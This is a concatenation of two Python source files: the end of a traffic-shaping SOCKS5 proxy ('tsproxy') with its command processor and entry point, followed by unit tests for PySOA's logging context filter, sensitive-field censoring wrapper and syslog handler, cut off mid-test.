logging.info('[{0:d}] Server connection close being processed, closing Browser connection'.format(self.client_id))
self.handle_close()
else:
logging.info('[{0:d}] Server connection close being processed, queuing browser connection close'.format(self.client_id))
self.needs_close = True
def writable(self):
return len(self.buffer) > 0
def handle_write(self):
if len(self.buffer) > 0:
sent = self.send(self.buffer)
logging.debug('[{0:d}] SOCKS <= {1:d} byte(s)'.format(self.client_id, sent))
self.buffer = self.buffer[sent:]
if self.needs_close and len(self.buffer) == 0:
logging.info('[{0:d}] queued browser connection close being processed, closing Browser connection'.format(self.client_id))
self.needs_close = False
self.handle_close()
def handle_read(self):
global connections
global dns_cache
try:
while True:
# Consume in up-to packet-sized chunks (TCP packet payload as 1460 bytes from 1500 byte ethernet frames)
data = self.recv(1460)
if data:
data_len = len(data)
if self.state == self.STATE_CONNECTED:
logging.debug('[{0:d}] SOCKS => {1:d} byte(s)'.format(self.client_id, data_len))
self.SendMessage('data', {'data': data})
elif self.state == self.STATE_WAITING_FOR_HANDSHAKE:
self.state = self.STATE_ERROR #default to an error state, set correctly if things work out
if data_len >= 2 and ord(data[0]) == 0x05:
supports_no_auth = False
auth_count = ord(data[1])
if data_len == auth_count + 2:
for i in range(auth_count):
offset = i + 2
if ord(data[offset]) == 0:
supports_no_auth = True
if supports_no_auth:
# Respond with a message that "No Authentication" was agreed to
logging.info('[{0:d}] New Socks5 client'.format(self.client_id))
response = chr(0x05) + chr(0x00)
self.state = self.STATE_WAITING_FOR_CONNECT_REQUEST
self.buffer += response
self.handle_write()
elif self.state == self.STATE_WAITING_FOR_CONNECT_REQUEST:
self.state = self.STATE_ERROR #default to an error state, set correctly if things work out
if data_len >= 10 and ord(data[0]) == 0x05 and ord(data[2]) == 0x00:
if ord(data[1]) == 0x01: #TCP connection (only supported method for now)
connections[self.client_id]['server'] = TCPConnection(self.client_id)
self.requested_address = data[3:]
port_offset = 0
if ord(data[3]) == 0x01:
port_offset = 8
self.ip = '{0:d}.{1:d}.{2:d}.{3:d}'.format(ord(data[4]), ord(data[5]), ord(data[6]), ord(data[7]))
elif ord(data[3]) == 0x03:
name_len = ord(data[4])
if data_len >= 6 + name_len:
port_offset = 5 + name_len
self.hostname = data[5:5 + name_len]
elif ord(data[3]) == 0x04 and data_len >= 22:
port_offset = 20
self.ip = ''
for i in range(16):
self.ip += '{0:02x}'.format(ord(data[4 + i]))
if i % 2 and i < 15:
self.ip += ':'
if port_offset and connections[self.client_id]['server'] is not None:
self.port = 256 * ord(data[port_offset]) + ord(data[port_offset + 1])
if self.port:
if self.ip is None and self.hostname is not None:
if self.hostname in dns_cache:
self.state = self.STATE_CONNECTING
cache_entry = dns_cache[self.hostname]
self.addresses = cache_entry['addresses']
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port, 'localhost': cache_entry['localhost']})
else:
self.state = self.STATE_RESOLVING
self.SendMessage('resolve', {'hostname': self.hostname, 'port': self.port})
elif self.ip is not None:
self.state = self.STATE_CONNECTING
logging.debug('[{0:d}] Socks Connect - calling getaddrinfo for {1}:{2:d}'.format(self.client_id, self.ip, self.port))
self.addresses = socket.getaddrinfo(self.ip, self.port)
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port})
else:
return
except:
pass
def handle_close(self):
logging.info('[{0:d}] Browser Connection Closed by browser'.format(self.client_id))
self.state = self.STATE_ERROR
self.close()
try:
if self.client_id in connections:
if 'client' in connections[self.client_id]:
del connections[self.client_id]['client']
if 'server' in connections[self.client_id]:
self.SendMessage('closed', {})
else:
del connections[self.client_id]
except:
pass
def HandleResolved(self, message):
global dns_cache
if self.state == self.STATE_RESOLVING:
if 'addresses' in message and len(message['addresses']):
self.state = self.STATE_CONNECTING
self.addresses = message['addresses']
dns_cache[self.hostname] = {'addresses': self.addresses, 'localhost': message['localhost']}
logging.debug('[{0:d}] Resolved {1}, Connecting'.format(self.client_id, self.hostname))
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port, 'localhost': message['localhost']})
else:
# Send host unreachable error
self.state = self.STATE_ERROR
self.buffer += chr(0x05) + chr(0x04) + self.requested_address
self.handle_write()
def HandleConnected(self, message):
if 'success' in message and self.state == self.STATE_CONNECTING:
response = chr(0x05)
if message['success']:
response += chr(0x00)
logging.debug('[{0:d}] Connected to {1}'.format(self.client_id, self.hostname))
self.state = self.STATE_CONNECTED
else:
response += chr(0x04)
self.state = self.STATE_ERROR
response += chr(0x00)
response += self.requested_address
self.buffer += response
self.handle_write()
########################################################################################################################
# stdin command processor
########################################################################################################################
class CommandProcessor():
def __init__(self):
thread = threading.Thread(target = self.run, args=())
thread.daemon = True
thread.start()
def run(self):
global must_exit
while not must_exit:
for line in iter(sys.stdin.readline, ''):
self.ProcessCommand(line.strip())
def ProcessCommand(self, input):
global in_pipe
global out_pipe
global needs_flush
global REMOVE_TCP_OVERHEAD
global port_mappings
global server
if len(input):
ok = False
try:
command = input.split()
if len(command) and len(command[0]):
if command[0].lower() == 'flush':
ok = True
elif command[0].lower() == 'set' and len(command) >= 3:
if command[1].lower() == 'rtt' and len(command[2]):
rtt = float(command[2])
latency = rtt / 2000.0
in_pipe.latency = latency
out_pipe.latency = latency
ok = True
elif command[1].lower() == 'inkbps' and len(command[2]):
in_pipe.kbps = float(command[2]) * REMOVE_TCP_OVERHEAD
ok = True
elif command[1].lower() == 'outkbps' and len(command[2]):
out_pipe.kbps = float(command[2]) * REMOVE_TCP_OVERHEAD
ok = True
elif command[1].lower() == 'mapports' and len(command[2]):
SetPortMappings(command[2])
ok = True
elif command[0].lower() == 'reset' and len(command) >= 2:
if command[1].lower() == 'rtt' or command[1].lower() == 'all':
in_pipe.latency = 0
out_pipe.latency = 0
ok = True
if command[1].lower() == 'inkbps' or command[1].lower() == 'all':
in_pipe.kbps = 0
ok = True
if command[1].lower() == 'outkbps' or command[1].lower() == 'all':
out_pipe.kbps = 0
ok = True
if command[1].lower() == 'mapports' or command[1].lower() == 'all':
port_mappings = {}
ok = True
if ok:
needs_flush = True
except:
pass
if not ok:
PrintMessage('ERROR')
# open and close a local socket which will interrupt the long polling loop to process the flush
if needs_flush:
s = socket.socket()
s.connect((server.ipaddr, server.port))
s.close()
########################################################################################################################
# Main Entry Point
########################################################################################################################
def main():
global server
global options
global in_pipe
global out_pipe
global dest_addresses
global port_mappings
global map_localhost
import argparse
global REMOVE_TCP_OVERHEAD
parser = argparse.ArgumentParser(description='Traffic-shaping socks5 proxy.',
prog='tsproxy')
parser.add_argument('-v', '--verbose', action='count', help="Increase verbosity (specify multiple times for more). -vvvv for full debug output.")
parser.add_argument('--logfile', help="Write log messages to given file instead of stdout.")
parser.add_argument('-b', '--bind', default='localhost', help="Server interface address (defaults to localhost).")
parser.add_argument('-p', '--port', type=int, default=1080, help="Server port (defaults to 1080, use 0 for randomly assigned).")
parser.add_argument('-r', '--rtt', type=float, default=.0, help="Round Trip Time Latency (in ms).")
parser.add_argument('-i', '--inkbps', type=float, default=.0, help="Download Bandwidth (in 1000 bits/s - Kbps).")
parser.add_argument('-o', '--outkbps', type=float, default=.0, help="Upload Bandwidth (in 1000 bits/s - Kbps).")
parser.add_argument('-w', '--window', type=int, default=10, help="Emulated TCP initial congestion window (defaults to 10).")
parser.add_argument('-d', '--desthost', help="Redirect all outbound connections to the specified host.")
parser.add_argument('-m', '--mapports', help="Remap outbound ports. Comma-separated list of original:new with * as a wildcard. --mapports '443:8443,*:8080'")
parser.add_argument('-l', '--localhost', action='store_true', default=False,
help="Include connections already destined for localhost/127.0.0.1 in the host and port remapping.")
options = parser.parse_args()
# Set up logging
log_level = logging.CRITICAL
if options.verbose == 1:
log_level = logging.ERROR
elif options.verbose == 2:
log_level = logging.WARNING
elif options.verbose == 3:
log_level = logging.INFO
elif options.verbose >= 4:
log_level = logging.DEBUG
if options.logfile is not None:
logging.basicConfig(filename=options.logfile, level=log_level,
format="%(asctime)s.%(msecs)03d - %(message)s", datefmt="%H:%M:%S")
else:
logging.basicConfig(level=log_level, format="%(asctime)s.%(msecs)03d - %(message)s", datefmt="%H:%M:%S")
# Parse any port mappings
if options.mapports:
SetPortMappings(options.mapports)
map_localhost = options.localhost
# Resolve the address for a rewrite destination host if one was specified
if options.desthost:
logging.debug('Startup - calling getaddrinfo for {0}:{1:d}'.format(options.desthost, GetDestPort(80)))
dest_addresses = socket.getaddrinfo(options.desthost, GetDestPort(80))
# Set up the pipes. 1/2 of the latency gets applied in each direction (and /1000 to convert to seconds)
in_pipe = TSPipe(TSPipe.PIPE_IN, options.rtt / 2000.0, options.inkbps * REMOVE_TCP_OVERHEAD)
out_pipe = TSPipe(TSPipe.PIPE_OUT, options.rtt / 2000.0, options.outkbps * REMOVE_TCP_OVERHEAD)
signal.signal(signal.SIGINT, signal_handler)
server = Socks5Server(options.bind, options.port)
command_processor = CommandProcessor()
PrintMessage('Started Socks5 proxy server on {0}:{1:d}\nHit Ctrl-C to exit.'.format(server.ipaddr, server.port))
run_loop()
def signal_handler(signal, frame):
global server
global must_exit
logging.error('Exiting...')
must_exit = True
del server
# Wrapper around the asyncore loop that lets us poll the in/out pipes every 1ms
def run_loop():
global must_exit
global in_pipe
global out_pipe
global needs_flush
global flush_pipes
global last_activity
winmm = None
# increase the windows timer resolution to 1ms
if platform.system() == "Windows":
try:
import ctypes
winmm = ctypes.WinDLL('winmm')
winmm.timeBeginPeriod(1)
except:
pass
last_activity = time.clock()
last_check = time.clock()
# disable gc to avoid pauses during traffic shaping/proxying
gc.disable()
while not must_exit:
# Tick every 1ms if traffic-shaping is enabled and we have data or are doing background dns lookups, every 1 second otherwise
lock.acquire()
tick_interval = 0.001
if background_activity_count == 0:
if in_pipe.next_message is None and in_pipe.queue.empty() and out_pipe.next_message is None and out_pipe.queue.empty():
tick_interval = 1.0
elif in_pipe.kbps == .0 and in_pipe.latency == 0 and out_pipe.kbps == .0 and out_pipe.latency == 0:
tick_interval = 1.0
lock.release()
asyncore.poll(tick_interval, asyncore.socket_map)
if needs_flush:
flush_pipes = True
needs_flush = False
out_pipe.tick()
in_pipe.tick()
if flush_pipes:
PrintMessage('OK')
flush_pipes = False
# Every 500 ms check to see if it is a good time to do a gc
now = time.clock()
if now - last_check > 0.5:
last_check = now
# manually gc after 5 seconds of idle
if now - last_activity >= 5:
last_activity = now
logging.debug("Triggering manual GC")
gc.collect()
if winmm is not None:
winmm.timeEndPeriod(1)
def GetDestPort(port):
global port_mappings
if port_mappings is not None:
src_port = str(port)
if src_port in port_mappings:
return port_mappings[src_port]
elif 'default' in port_mappings:
return port_mappings['default']
return port
def SetPortMappings(map_string):
global port_mappings
port_mappings = {}
map_string = map_string.strip('\'" \t\r\n')
for pair in map_string.split(','):
(src, dest) = pair.split(':')
if src == '*':
port_mappings['default'] = int(dest)
logging.debug("Default port mapped to port {0}".format(dest))
else:
logging.debug("Port {0} mapped to port {1}".format(src, dest))
port_mappings[src] = int(dest)
if '__main__' == __name__:
main()
|
test_logging.py | from __future__ import (
absolute_import,
unicode_literals,
)
import gc
from logging import (
WARNING,
Formatter,
LogRecord,
)
import logging.handlers
import socket
import threading
import unittest
import six
from pysoa.common.logging import (
PySOALogContextFilter,
RecursivelyCensoredDictWrapper,
SyslogHandler,
)
from pysoa.test.compatibility import mock
class TestPySOALogContextFilter(unittest.TestCase):
def tearDown(self):
# Make sure that if anything goes wrong with these tests, that it doesn't affect any other tests
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
def test_threading(self):
thread_data = {}
def fn(*_, **__):
thread_data['first_get'] = PySOALogContextFilter.get_logging_request_context()
PySOALogContextFilter.set_logging_request_context(foo='bar', **{'baz': 'qux'})
thread_data['second_get'] = PySOALogContextFilter.get_logging_request_context()
if thread_data.get('do_clear'):
PySOALogContextFilter.clear_logging_request_context()
thread_data['third_get'] = PySOALogContextFilter.get_logging_request_context()
self.assertIsNone(PySOALogContextFilter.get_logging_request_context())
PySOALogContextFilter.set_logging_request_context(request_id=1234, **{'correlation_id': 'abc'})
self.assertEqual(
{'request_id': 1234, 'correlation_id': 'abc'},
PySOALogContextFilter.get_logging_request_context()
)
thread = threading.Thread(target=fn)
thread.start()
thread.join()
self.assertEqual(
{'request_id': 1234, 'correlation_id': 'abc'},
PySOALogContextFilter.get_logging_request_context()
)
self.assertIsNone(thread_data['first_get'])
self.assertEqual({'foo': 'bar', 'baz': 'qux'}, thread_data['second_get'])
self.assertEqual({'foo': 'bar', 'baz': 'qux'}, thread_data['third_get'])
thread_data['do_clear'] = True
thread = threading.Thread(target=fn)
thread.start()
thread.join()
self.assertEqual(
{'request_id': 1234, 'correlation_id': 'abc'},
PySOALogContextFilter.get_logging_request_context()
)
self.assertIsNone(thread_data['first_get'])
self.assertEqual({'foo': 'bar', 'baz': 'qux'}, thread_data['second_get'])
self.assertIsNone(thread_data['third_get'])
def test_filter(self):
record = mock.MagicMock()
log_filter = PySOALogContextFilter()
self.assertTrue(log_filter.filter(record))
self.assertEqual('--', record.correlation_id)
self.assertEqual('--', record.request_id)
self.assertEqual('unknown', record.service_name)
PySOALogContextFilter.set_service_name('foo_qux')
PySOALogContextFilter.set_logging_request_context(filter='mine', **{'logger': 'yours'})
self.assertEqual({'filter': 'mine', 'logger': 'yours'}, PySOALogContextFilter.get_logging_request_context())
record.reset_mock()
self.assertTrue(log_filter.filter(record))
self.assertEqual('--', record.correlation_id)
self.assertEqual('--', record.request_id)
self.assertEqual('foo_qux', record.service_name)
PySOALogContextFilter.set_logging_request_context(request_id=4321, **{'correlation_id': 'abc1234'})
self.assertEqual(
{'request_id': 4321, 'correlation_id': 'abc1234'},
PySOALogContextFilter.get_logging_request_context()
)
record.reset_mock()
self.assertTrue(log_filter.filter(record))
self.assertEqual('abc1234', record.correlation_id)
self.assertEqual(4321, record.request_id)
self.assertEqual('foo_qux', record.service_name)
PySOALogContextFilter.clear_logging_request_context()
self.assertEqual({'filter': 'mine', 'logger': 'yours'}, PySOALogContextFilter.get_logging_request_context())
record.reset_mock()
self.assertTrue(log_filter.filter(record))
self.assertEqual('--', record.correlation_id)
self.assertEqual('--', record.request_id)
self.assertEqual('foo_qux', record.service_name)
PySOALogContextFilter.clear_logging_request_context()
self.assertIsNone(PySOALogContextFilter.get_logging_request_context())
record.reset_mock()
self.assertTrue(log_filter.filter(record))
self.assertEqual('--', record.correlation_id)
self.assertEqual('--', record.request_id)
self.assertEqual('foo_qux', record.service_name)
class TestRecursivelyCensoredDictWrapper(unittest.TestCase):
def test_non_dict(self):
with self.assertRaises(ValueError):
# noinspection PyTypeChecker
RecursivelyCensoredDictWrapper(['this', 'is', 'a', 'list'])
def test_simple_dict(self):
original = {
'hello': 'world',
'password': 'censor!',
'credit_card': '1234567890123456',
'passphrase': True,
'cvv': 938,
}
wrapped = RecursivelyCensoredDictWrapper(original)
expected = {
'hello': 'world',
'password': '**********',
'credit_card': '**********',
'passphrase': True,
'cvv': '**********',
}
self.assertEqual(expected, eval(repr(wrapped)))
self.assertEqual(repr(wrapped), str(wrapped))
if six.PY2:
self.assertEqual(six.text_type(repr(wrapped)), six.text_type(wrapped))
else:
self.assertEqual(six.binary_type(repr(wrapped), 'utf-8'), six.binary_type(wrapped))
# Make sure the original dict wasn't modified
self.assertEqual(
{
'hello': 'world',
'password': 'censor!',
'credit_card': '1234567890123456',
'passphrase': True,
'cvv': 938,
},
original,
)
def test_complex_dict(self):
original = {
'a_list': [
'a',
True,
109.8277,
{'username': 'nick', 'passphrase': 'this should be censored'},
{'username': 'allison', 'passphrase': ''},
],
'a_set': {
'b',
False,
18273,
},
'a_tuple': (
'c',
True,
42,
{'cc_number': '9876543210987654', 'cvv': '987', 'expiration': '12-20', 'pin': '4096'},
),
'passwords': ['Make It Censored', None, '', 'Hello, World!'],
'credit_card_numbers': ('1234', '5678', '9012'),
'cvv2': {'a', None, '', 'b'},
'pin': frozenset({'c', 'd', ''}),
'foo': 'bar',
'passphrases': {
'not_sensitive': 'not censored',
'bankAccount': 'this should also be censored',
}
}
wrapped = RecursivelyCensoredDictWrapper(original)
expected = {
'a_list': [
'a',
True,
109.8277,
{'username': 'nick', 'passphrase': '**********'},
{'username': 'allison', 'passphrase': ''},
],
'a_set': {
'b',
False,
18273,
},
'a_tuple': (
'c',
True,
42,
{'cc_number': '**********', 'cvv': '**********', 'expiration': '12-20', 'pin': '**********'},
),
'passwords': ['**********', None, '', '**********'],
'credit_card_numbers': ('**********', '**********', '**********'),
'cvv2': {'**********', None, '', '**********'},
'pin': frozenset({'**********', '**********', ''}),
'foo': 'bar',
'passphrases': {
'not_sensitive': 'not censored',
'bankAccount': '**********',
}
}
self.assertEqual(expected, eval(repr(wrapped)))
self.assertEqual(repr(wrapped), str(wrapped))
if six.PY2:
self.assertEqual(six.text_type(repr(wrapped)), six.text_type(wrapped))
else:
self.assertEqual(six.binary_type(repr(wrapped), 'utf-8'), six.binary_type(wrapped))
self.assertEqual(
{
'a_list': [
'a',
True,
109.8277,
{'username': 'nick', 'passphrase': 'this should be censored'},
{'username': 'allison', 'passphrase': ''},
],
'a_set': {
'b',
False,
18273,
},
'a_tuple': (
'c',
True,
42,
{'cc_number': '9876543210987654', 'cvv': '987', 'expiration': '12-20', 'pin': '4096'},
),
'passwords': ['Make It Censored', None, '', 'Hello, World!'],
'credit_card_numbers': ('1234', '5678', '9012'),
'cvv2': {'a', None, '', 'b'},
'pin': frozenset({'c', 'd', ''}),
'foo': 'bar',
'passphrases': {
'not_sensitive': 'not censored',
'bankAccount': 'this should also be censored',
}
},
original,
)
class TestSyslogHandler(object):
"""
It's weird that we're messing with garbage collection here, but it's necessary. The problem is that the PySOA
server starts an async event loop in Python 3.6+, and some of the tests in this project unavoidably and
incidentally exercise that code. When event loops are garbage collected, their `__del__` methods `close` their
selectors, which are anonymous unix sockets.
Enter this test class. In order to test the custom `SyslogHandler`, it is necessary to `mock.patch` sockets and,
due to design decisions made by the Python folks who wrote the socket code and the base CPython `SyslogHandler`,
it is impossible to do this patching in a way that doesn't affect all sockets everywhere. Turns out that garbage
collection has a tendency to run during this test class, and seems to be timed perfectly to happen while sockets
are patched, causing errors and test failures.
To prevent these errors and test failures, we do three things:
- Preemptively run garbage collection once before any tests in the class, so that we don't use too much memory
during the class.
- Disable garbage collection at the start of each test to ensure it cannot run during the test
- Enable garbage collection at the end of each test to give it a chance to run if it needs to
"""
@classmethod
def setup_class(cls):
gc.collect()
# noinspection PyMethodMayBeStatic
def setup_method(self, _method):
gc.disable()
# noinspection PyMethodMayBeStatic
def teardown_method(self, _method):
gc.enable()
def test_constructor(self):
handler = SyslogHandler()
assert handler.socktype == socket.SOCK_DGRAM
if six.PY2:
assert not handler.unixsocket
else:
assert handler.unixsocket is False
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
assert handler.maximum_length >= 1252 # (1280 - 28)
handler = SyslogHandler(overflow=SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE)
assert handler.socktype == socket.SOCK_DGRAM
if six.PY2:
assert not handler.unixsocket
else:
assert handler.unixsocket is False
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
assert handler.maximum_length >= 1252 # (1280 - 28)
with mock.patch.object(socket.socket, 'connect'):
handler = SyslogHandler(socket_type=socket.SOCK_STREAM)
assert handler.socktype == socket.SOCK_STREAM
if six.PY2:
assert not handler.unixsocket
else:
assert handler.unixsocket is False
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
assert handler.maximum_length == 1024 * 1024
handler = SyslogHandler(address='/path/to/unix.socket')
assert handler.socktype == socket.SOCK_DGRAM
assert handler.unixsocket is True or handler.unixsocket == 1 # Python 2 compatibility
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
assert handler.maximum_length == 1024 * 1024
handler = SyslogHandler(address='/path/to/unix.socket', socket_type=socket.SOCK_STREAM)
assert handler.socktype == socket.SOCK_STREAM
assert handler.unixsocket is True or handler.unixsocket == 1 # Python 2 compatibility
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
assert handler.maximum_length == 1024 * 1024
def test_emit_shorter_than_limit(self):
handler = SyslogHandler()
handler.maximum_length = 500
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a fairly short message',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
mock_send.assert_called_once_with([
priority + b'foo_file: bar_service WARNING This is a fairly short message\000',
])
def test_emit_longer_than_limit_truncate(self):
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
handler.ident = '5678'
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message that is going to exceed the maximum byte count and will need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b'5678foo_file: bar_service WARNING This is a much longer message that is going to exceed the max\000'
)
assert len(expected1) == 100
mock_send.assert_called_once_with([
expected1,
])
def test_emit_longer_than_limit_truncate_unicode_within(self):
# b'\xf0\x9f\x98\xb1' = u'\U0001f631' = shocked face with hands to cheeks
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
handler.ident = '5678'
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message \U0001f631 that is going to exceed the maximum byte count and will '
'need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b'5678foo_file: bar_service WARNING This is a much longer message \xf0\x9f\x98\xb1 that is going to '
b'exceed th\000'
)
assert len(expected1) == 100
mock_send.assert_called_once_with([
expected1,
])
def test_emit_longer_than_limit_truncate_unicode_at_boundary(self):
# b'\xf0\x9f\x98\xb1' = u'\U0001f631' = shocked face with hands to cheeks
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
handler.ident = '5678'
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message that is going to exceed the \U0001f631 maximum byte count and will '
'need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b'5678foo_file: bar_service WARNING This is a much longer message that is going to exceed the \000'
)
assert len(expected1) == 97
mock_send.assert_called_once_with([
expected1,
])
def test_emit_longer_than_limit_fragment(self):
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message that is going to exceed the maximum byte count and will need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b"foo_file: bar_service WARNING This is a much longer message that is going to exceed... (cont'd)\000"
)
assert len(expected1) == 100
expected2 = (
priority +
b"foo_file: bar_service WARNING (cont'd #2) ... the maximum byte count and will need ... (cont'd)\000"
)
assert len(expected2) == 100
expected3 = (
priority +
b"foo_file: bar_service WARNING (cont'd #3) ...truncating\000"
)
assert len(expected3) < 100
mock_send.assert_called_once_with([
expected1,
expected2,
expected3,
])
def test_emit_longer_than_limit_fragment_unicode_within(self):
# b'\xf0\x9f\x98\xb1' = u'\U0001f631' = shocked face with hands to cheeks
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message \U0001f631 that is going to exceed the maximum byte count and will '
'need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b"foo_file: bar_service WARNING This is a much longer message \xf0\x9f\x98\xb1 that is going to "
b"e... (cont'd)\000"
)
assert len(expected1) == 100
expected2 = (
priority +
b"foo_file: bar_service WARNING (cont'd #2) ...xceed the maximum byte count and will ... (cont'd)\000"
)
assert len(expected2) == 100
expected3 = (
priority +
b"foo_file: bar_service WARNING (cont'd #3) ...need truncating\000"
)
assert len(expected3) < 100
mock_send.assert_called_once_with([
expected1,
expected2,
expected3,
])
def test_emit_longer_than_limit_fragment_unicode_at_boundary(self):
# b'\xf0\x9f\x98\xb1' = u'\U0001f631' = shocked face with hands to cheeks
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message that yes is going to \U0001f631 exceed the maximum byte count and will '
'need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b"foo_file: bar_service WARNING This is a much longer message that yes is going to ... (cont'd)\000"
)
assert len(expected1) == 98
expected2 = (
priority +
b"foo_file: bar_service WARNING (cont'd #2) ...\xf0\x9f\x98\xb1 exceed the maximum byte count and"
b"... (cont'd)\000"
)
assert len(expected2) == 100
expected3 = (
priority +
b"foo_file: bar_service WARNING (cont'd #3) ... will need truncating\000"
)
assert len(expected3) < 100
mock_send.assert_called_once_with([
expected1,
expected2,
expected3,
])
# noinspection PyProtectedMember
def test_send_udp(self):
handler = SyslogHandler(address=('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT))
with mock.patch.object(socket.socket, 'sendto') as mock_send_to:
handler._send(['this is the first part', 'here is another part', 'one more part'])
mock_send_to.assert_has_calls([
mock.call('this is the first part', ('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT)),
mock.call('here is another part', ('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT)),
mock.call('one more part', ('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT)),
])
# noinspection PyProtectedMember
def test_send_tcp(self):
with mock.patch.object(socket.socket, 'connect') as mock_connect:
handler = SyslogHandler(
address=('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT),
socket_type=socket.SOCK_STREAM,
)
mock_connect.assert_called_once_with(('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT))
with mock.patch.object(socket.socket, 'sendall') as mock_send_all:
handler._send(['this is the first part', 'here is another part', 'one more part'])
mock_send_all.assert_has_calls([
mock.call('this is the first part'),
mock.call('here is another part'),
mock.call('one more part'),
])
# noinspection PyProtectedMember
def test_send_unix(self):
with mock.patch.object(socket.socket, 'connect') as mock_connect:
handler = SyslogHandler(address='/path/to/unix.socket')
mock_connect.assert_called_once_with('/path/to/unix.socket')
with mock.patch.object(socket.socket, 'send') as mock_send:
handler._send(['this is the first part', 'here is another part', 'one more part'])
mock_send.assert_has_calls([
mock.call('this is the first part'),
mock.call('here is another part'),
mock.call('one more part'),
])
# noinspection PyProtectedMember
def test_send_unix_with_failure_part_way_through(self):
with mock.patch.object(socket.socket, 'connect') as mock_connect:
handler = SyslogHandler(address='/path/to/a/different.socket')
mock_connect.assert_called_once_with('/path/to/a/different.socket')
# This is weird. Creating a new socket actually dynamically creates the `send` method, which breaks mocking.
# So we have to mock the send, connect, and close methods, and then when the send returns an error on the
# second call, the close method has to de-mock send so that a new socket can be created, and then the
# connection method has to re-mock send so that we can capture the send retries. Yuck.
first_mock_send_patch = mock.patch.object(socket.socket, 'send')
second_mock_send_patch = mock.patch.object(socket.socket, 'send')
mock_sends = {'first_mock_send': None, 'second_mock_send': None}
def close_side_effect(*_, **__):
first_mock_send_patch.stop()
def connect_side_effect(*_, **__):
mock_sends['second_mock_send'] = second_mock_send_patch.start()
mock_sends['second_mock_send'].side_effect = [True, True]
try:
with mock.patch.object(socket.socket, 'close') as mock_close, \
mock.patch.object(socket.socket, 'connect') as mock_reconnect:
mock_sends['first_mock_send'] = first_mock_send_patch.start()
mock_sends['first_mock_send'].side_effect = [True, OSError()]
mock_close.side_effect = close_side_effect
